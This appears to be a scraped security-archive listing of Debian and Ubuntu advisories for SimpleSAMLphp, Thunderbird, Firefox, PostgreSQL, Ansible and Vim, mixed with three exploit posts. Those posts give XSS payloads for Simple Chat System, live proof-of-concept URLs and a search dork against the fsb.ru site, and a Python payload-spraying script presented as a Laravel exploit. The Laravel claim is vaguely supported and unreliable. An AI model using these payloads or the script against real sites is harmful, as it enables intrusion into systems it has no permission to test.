AppleAVD has an integer underflow in AV1_Syntax::Parse_Header that can lead to out-of-bounds reads.

AppleAVD AV1_Syntax::Parse_Header Integer Underflow / Out-Of-Bounds Reads

Debian Linux Security Advisory 5822-1 - It was discovered that in SimpleSAMLphp, an implementation of the SAML 2.0 protocol, is prone to a XXE vulnerability when loading an (untrusted) XML document.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5822-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoDecember 02, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : simplesamlphpCVE ID         : CVE-2024-52596It was discovered that in SimpleSAMLphp, an implementation of the SAML2.0 protocol, is prone to a XXE vulnerability when loading an(untrusted) XML document.For the stable distribution (bookworm), this problem has been fixed inversion 1.19.7-1+deb12u1.We recommend that you upgrade your simplesamlphp packages.For the detailed security status of simplesamlphp please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/simplesamlphpFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmdNx7dfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0Ramw//R//UPGNKlLuKl+WKnQgmgGaI41VEE+Ny4juiPNpHDfB1xlQLO/QyrALMtolILT6yeCgYP7nYUj5iEWaEP04iAa8xZyt1dQyCBmHPWrRhGPD0fB2Ne1dC6xujjHWFyQ/j26It23Vuogp8I/Kh1EdMYfDP4heSaPQlL6hMrj+tMMCfIZfmrVgFAVSFVNtWFbmkidySw8rGtNKr5rv8DCPyxGZWGIFNsog4IbQ/9F01eovIdAbVMANKmj0Anw9BjH9eXK38CPvhUmewT/l7WPcMyhav9yQtE/OxMilIiCTT3BOlO+kdUmdfk0jr6+Q57mmdQR7CYM4eAjXeDg7akyquhT+L/x0zNZl25bA/E2XMkQwxBnzV5KU3Z8WjBXXirbkIjHkwPAKrZCOv75ryYL2WKj5yT6KaLAx7KMqq5OQPFAOAD/3/0llsT9vQyTBk0f5MaTjZ4mIRIcsSD5Vu4QgaaZXH1FLlKK6ykcZ2QHGNdGYkRmfP2YdTcK5s8rReoIUSaclhlz3rKS+lv5WrbOQbcOvtpq+squIFqD0rRGA9r4dN/g0mGu6Uh/fY7xmkE9Ell5Lkg2LUwsOpsx/AvO1QOPJhxUcqYtko8sC8waC3TAlYOeBycWQk5aFeDPpgzs7JoZLfZB2hIsjD4QLe/Kavp06JCwIcHDzlnwJ7RaZ/cYE==5GGL-----END PGP SIGNATURE-----

Debian Security Advisory 5822-1

Debian Linux Security Advisory 5821-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5821-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
November 27, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2024-11692 CVE-2024-11694 CVE-2024-11695  
                 CVE-2024-11696 CVE-2024-11697 CVE-2024-11699

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:128.5.0esr-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmdHcv8ACgkQEMKTtsN8  
TjY7kQ/9HOqGp2HwtLMf7jRWdCtBtwsAVOvOiYsGNr18FJRzTEj8CTXsz2ucn4Bg  
9c79NfbbMKQghXNKApzbDJb5Q2AEl9feic1EdMvKKqkTQQmWTKkxaTyqIVZ6/j/E  
pc2FmyKJKwHpPDseEDbG5UAv+Ea5HEvKuVp2G7KmkmxHVyh8iaanaQlk6GNgdzYd  
mUoHdlLre+MXp39ZzMyIGRs2NFUEP4gme7EglldGq77JXRGwWB3IDpYk0SViYKu0  
znO2+ITE39crVBTIGapaf2QD3Dppvbz0hsULrrPwmkDqlK4OqFJyaRuxGyv/Mymv  
YRQcBHpV9BQO9Xcl/RrD7qDgLyEHgjpX+c4tBau4h1+7RejDUTNyO7zArOrBAwYS  
pqd97quGWe9sSZyOJj1pF/yQRct9WExbMAhqGbNt5zdET7BSb09GtiKywT/vQKBl  
VEIO0LsAPYx1G+2nzhwdqzIQu6ojk52R0w/jmeBknsSsFp9mbfI5KKwBtNXWSpT+  
3z3NkWfr/5kzbPERj2jkS5MV/RzAe4d7zgxpEUMySIzUujszWI9RXo77heGYQ9LW  
3QfRqRmTUCwBaEdhf7YIqiYtyG7B6OYIOJPasDxvErRoEXwJKXic/oPxYmyCS2gx  
dYsoZntZJOvtjFzfzVBS3nJTv7+4PBWmqZSE9sCsDfazbJzn/fw=  
=RVGl  
-----END PGP SIGNATURE-----

Debian Security Advisory 5821-1

Debian Linux Security Advisory 5820-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, spoofing or cross-site scripting.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5820-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 27, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-11692 CVE-2024-11694 CVE-2024-11695                 CVE-2024-11696 CVE-2024-11697 CVE-2024-11699Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, spoofing or cross-site scripting. For the stable distribution (bookworm), these problems have been fixed inversion 128.5.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmdHcXoACgkQEMKTtsN8TjbVxg/+NpPN+XZlnNqjVxWv48TJO30h6qh+Zf7SZ3ToyxKH/nvMEOKNsgbutlednaKDlfJbVa761JBSCVR/CyERS32hC+IGDdn9i5w0BS2IrMsPOnF/eU6OExgUr7rMMkPuKUp9+YGJJwfEDgqHWSGj0jr2S2HcyMAtx2vcINSIhzbIcO7xhxj6P4CGAA8/0l2eOq3YpclgYB23gP69arKDPj++AIv5lLpmg1bHr+aeXde9Am/roaEdvA6tK5PM4ay86TsSsMKjB9bQLjcpH8sHYoCt8VRA4qkCED2KAwQBxQ115imOoeRyJbRjWHpbIt9DEBxxsbYlQTldDhghV4YcsrIhEFaVY5zlDHYegEicxrCVoQJV0cHbpedeCp2otNEuM+crLl1l/CuSEeBkX2F1Ng1CM2/dGJpfuYN63mhO7Zs+UIuecqyLy7ZMe7Ucno2sNJnLPIwcx+zpQwLj/jUDzK89jzW4ZR6BQ5VOI2ex+blMsrYFKWuMoZhXpnlt7qC1/SzlseedwbyAeSXLBcLhMckXfshNsO/B6JmgluOb5i2BBLFlUOpSFwZdDoknaKxjXLF+EUhrV08R63pxKp5HZvsBiirQk1kfbhyReaaWjBn1nIOr5x0IASEGk+s4T80/s+5lJpGkqnzjwTK8bM58i7sN5qJIrJD2gAgtsXxyOYj02S4==Cop0-----END PGP SIGNATURE-----

Debian Security Advisory 5820-1

Simple Chat System version 1.0 suffers from a cross site scripting vulnerability.

Change Mirror Download

    #Exploit Title:Simple Chat System 1.0#Reflected XSS#Date:05/12/2024#Exploit Author:Merve Hatice Arslan#Vendor Homepage:https://code-projects.org/simple-chat-system/#Sofware Link:https://download.code-projects.org/details/ec6340ea-ef68-48d9-b9b2-da397f52b2dc#Version:1.0#Tested on:Linux / XAMPP#Scripting (XSS) in user.php via the name and username fields.#Payload:<img src=1 href=1 onerror="javascript:alert(1)"></img>

Simple Chat System 1.0 Cross Site Scripting

Ubuntu Security Notice 7132-1 - It was discovered that PostgreSQL incorrectly tracked tables with row security. A remote attacker could possibly use this issue to perform forbidden reads and modifications. Jacob Champion discovered that PostgreSQL clients used untrusted server error messages. An attacker that is able to intercept network communications could possibly use this issue to inject error messages that could be interpreted as valid query results.

==========================================================================  
Ubuntu Security Notice USN-7132-1  
December 02, 2024

postgresql-12, postgresql-14, postgresql-16 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.10  
- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in PostgreSQL.

Software Description:  
- postgresql-16: Object-relational SQL database  
- postgresql-14: Object-relational SQL database  
- postgresql-12: Object-relational SQL database

Details:

It was discovered that PostgreSQL incorrectly tracked tables with row  
security. A remote attacker could possibly use this issue to perform  
forbidden reads and modifications. (CVE-2024-10976)

Jacob Champion discovered that PostgreSQL clients used untrusted server  
error messages. An attacker that is able to intercept network  
communications could possibly use this issue to inject error messages that  
could be interpreted as valid query results. (CVE-2024-10977)

Tom Lane discovered that PostgreSQL incorrectly handled certain privilege  
assignments. A remote attacker could possibly use this issue to view or  
change different rows from those intended. (CVE-2024-10978)

Coby Abrams discovered that PostgreSQL incorrectly handled environment  
variables. A remote attacker could possibly use this issue to execute  
arbitrary code. (CVE-2024-10979)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.10  
  postgresql-16                   16.6-0ubuntu0.24.10.1  
  postgresql-client-16            16.6-0ubuntu0.24.10.1

Ubuntu 24.04 LTS  
  postgresql-16                   16.6-0ubuntu0.24.04.1  
  postgresql-client-16            16.6-0ubuntu0.24.04.1

Ubuntu 22.04 LTS  
  postgresql-14                   14.15-0ubuntu0.22.04.1  
  postgresql-client-14            14.15-0ubuntu0.22.04.1

Ubuntu 20.04 LTS  
  postgresql-12                   12.22-0ubuntu0.20.04.1  
  postgresql-client-12            12.22-0ubuntu0.20.04.1

This update uses a new upstream release, which includes additional bug  
fixes. After a standard system update you need to restart PostgreSQL to  
make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7132-1  
  CVE-2024-10976, CVE-2024-10977, CVE-2024-10978, CVE-2024-10979

Package Information:  
  https://launchpad.net/ubuntu/+source/postgresql-16/16.6-0ubuntu0.24.10.1  
  https://launchpad.net/ubuntu/+source/postgresql-16/16.6-0ubuntu0.24.04.1  
  https://launchpad.net/ubuntu/+source/postgresql-14/14.15-0ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/postgresql-12/12.22-0ubuntu0.20.04.1

Ubuntu Security Notice USN-7132-1

Ubuntu Security Notice 6846-2 - USN-6846-1 fixed vulnerabilities in ansible. The update introduced a regression in ansible. This update fixes the problem. It was discovered that Ansible incorrectly handled certain inputs when using tower_callback parameter. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to obtain sensitive information. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-6846-2December 02, 2024ansible regression==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 LTSSummary:USN-6846-1 caused some regression in ansible.Software Description:- ansible: Configuration management, deployment, and task execution systemDetails:USN-6846-1 fixed vulnerabilities in ansible. The update introduced aregression in ansible. This update fixes the problem.We apologize for the inconvenience.Original advisory details: It was discovered that Ansible incorrectly handled certain inputs when using tower_callback parameter. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to obtain sensitive information. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS. (CVE-2022-3697) It was discovered that Ansible incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to perform a Template Injection. (CVE-2023-5764)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS  ansible                         2.5.1+dfsg-1ubuntu0.1+esm3                                  Available with Ubuntu ProUbuntu 16.04 LTS  ansible                         2.0.0.2-2ubuntu1.3+esm3                                  Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6846-2  https://ubuntu.com/security/notices/USN-6846-1  https://launchpad.net/bugs/2073569

Ubuntu Security Notice USN-6846-2

Ubuntu Security Notice 7131-1 - It was discovered that Vim incorrectly handled memory when closing a buffer, leading to use-after-free. If a user was tricked into opening a specially crafted file, an attacker could crash the application, leading to a denial of service.

==========================================================================  
Ubuntu Security Notice USN-7131-1  
November 27, 2024

vim vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.10  
- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

Vim could be made to crash if it received specially crafted input.

Software Description:  
- vim: Vi IMproved - enhanced vi editor

Details:

It was discovered that Vim incorrectly handled memory when closing a  
buffer, leading to use-after-free. If a user was tricked into opening a  
specially crafted file, an attacker could crash the application, leading to  
a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.10  
  vim                             2:9.1.0496-1ubuntu6.2

Ubuntu 24.04 LTS  
  vim                             2:9.1.0016-1ubuntu7.5

Ubuntu 22.04 LTS  
  vim                             2:8.2.3995-1ubuntu2.21

Ubuntu 20.04 LTS  
  vim                             2:8.1.2269-1ubuntu5.29

Ubuntu 18.04 LTS  
  vim                             2:8.0.1453-1ubuntu1.13+esm11  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  vim                             2:7.4.1689-3ubuntu1.5+esm26  
                                  Available with Ubuntu Pro

Ubuntu 14.04 LTS  
  vim                             2:7.4.052-1ubuntu3.1+esm20  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7131-1  
  CVE-2024-47814

Package Information:  
  https://launchpad.net/ubuntu/+source/vim/2:9.1.0496-1ubuntu6.2  
  https://launchpad.net/ubuntu/+source/vim/2:9.1.0016-1ubuntu7.5  
  https://launchpad.net/ubuntu/+source/vim/2:8.2.3995-1ubuntu2.21  
  https://launchpad.net/ubuntu/+source/vim/2:8.1.2269-1ubuntu5.29

Ubuntu Security Notice USN-7131-1

The Russian FSB appears to suffer from a cross site scripting vulnerability. The researchers who discovered it have reported it multiple times to them.

/*!  
- # VULNERABILITY: Cross Site Scripting Federal Security Service of the Russian Federation  
- # Authenticated Persistent XSS  
- # GOOGLE DORK: inurl:fsb.ru/fsb/sh.htm?query=  
- # DATE: 2024-11-29  
- # SECURITY RESEARCHER:  E1.Coders  
- # VENDOR: FSB [ http://www.fsb.ru/ ]  
- # SOFTWARE LINK: http://www.fsb.ru/  
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C  
- # CWE: CWE-79  
*/

  ### -- [ Info: ]

 [i] A valid persistent XSS vulnerability was discovered in the search section of the Federal Security Service of the Russian Federation website.

 [i] Vulnerable parameter(s): sh.htm?query=  < AND >  /fsb/sh.htm?query=

  ### -- [ Impact: ]

 [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

  ### -- [ Payloads: ]

 `"'><img src=xxx:x \x22onerror=javascript:alert(1)>

 "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />

 `"'><img src=xxx:x onerror\x09=javascript:alert(1)>

  ### -- [ PoC #1 | Authenticated Persistent XSS | Background Image (Stripe Checkout): ]

 http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20onerror\x09=javascript:alert(1)%3E

 http://www.fsb.ru/fsb/sh.htm?query=%22/%3E%3Cimg/onerror=\x20javascript:alert(1)\x20src=xxx:x%20/%3E

 http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20\x22onerror=javascript:alert(1)%3E

  ### -- [ Contacts: ]

 [+] E-Mail: E1.Coders@Mail.Ru

 [+] GitHub: @e1coders

Russian FSB Cross Site Scripting

Laravel version 11.0 suffers from a cross site scripting vulnerability.

    /*!- # VULNERABILITY: Cross Site Scripting Laravel version 11.0 - # Authenticated Persistent XSS- # GOOGLE DORK: inurl:.com/?q=- # GOOGLE DORK: Site:.com/?q=- # DATE: 2024-12-01- # SECURITY RESEARCHER:  E1.Coders- # VENDOR: LARAVEL [https://laravel.com/ ]- # SOFTWARE LINK: https://laravel.com/docs/11.x/installation- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C- # CWE: CWE-79- # download payload https://raw.githubusercontent.com/payloadbox/xss-payload-list/refs/heads/master/Intruder/xss-payload-list.txt*/  ### -- [ Info: ] [i] A valid persistent XSS vulnerability was discovered in of the Laravel version 11.0  website. [i] Vulnerable parameter(s): - inurl:.com/?q=    [AND]    Site:.com/?q=  ### -- [ Impact: ] [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.  ### -- [ EXPLOIT : ]   import requests # Target URLurl = "https://TARGET.com/?q=" # Function to read payloads from a filedef read_payloads(filename="payloads.txt"):    try:        with open(filename, "r") as f:            payloads = [line.strip() for line in f]        return payloads    except FileNotFoundError:        print(f"Error: File '{filename}' not found.")        return [] # Function to perform the requestdef xss_attack(url, payload):    full_url = url + payload    try:        response = requests.get(full_url)        return response.status_code, response.text # return status code and response text    except requests.exceptions.RequestException as e:        print(f"An error occurred during the request: {e}")        return None, None # Main function to iterate over payloads and attackdef main():    payloads = read_payloads()    if not payloads:        return     results = []    for payload in payloads:        status_code, response_text = xss_attack(url, payload)        if status_code:          results.append({"payload": payload, "status_code": status_code, "response": response_text})     #Save results to a file (Example, you might need to adjust based on your desired output)    with open("attack_results.txt", "w") as f:        for result in results:            f.write(f"Payload: {result['payload']}\n")            f.write(f"Status Code: {result['status_code']}\n")            f.write(f"Response: {result['response']}\n\n") if __name__ == "__main__":    main()   ### -- [ Contacts: ] [+] E-Mail: E1.Coders@Mail.Ru [+] GitHub: @e1coders

Latest News